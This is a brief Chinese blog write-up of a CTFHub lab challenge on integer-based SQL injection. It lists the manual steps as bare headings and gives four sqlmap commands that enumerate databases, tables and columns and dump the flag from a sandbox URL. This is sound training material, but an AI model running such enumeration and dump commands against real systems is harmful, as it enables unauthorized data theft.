ctfhub技能树—sql注入—整数型注入

打开靶机

 

 查看页面信息

 

 查看回显位

 

 查询数据库名

 

 查询表名

 

 查询字段

 

 查询字段信息

 

 

 

使用sqlmap食用效果更佳

查数据库名

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 --dbs

 

 查表名

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

 

 查字段

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns

 

 dump数据

python2 sqlmap.py -u http://challenge-b6a3a184decf6636.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag -C flag --dump

 

posted @ 2020-03-11 13:34  anweilx  阅读(2954)  评论(1编辑  收藏  举报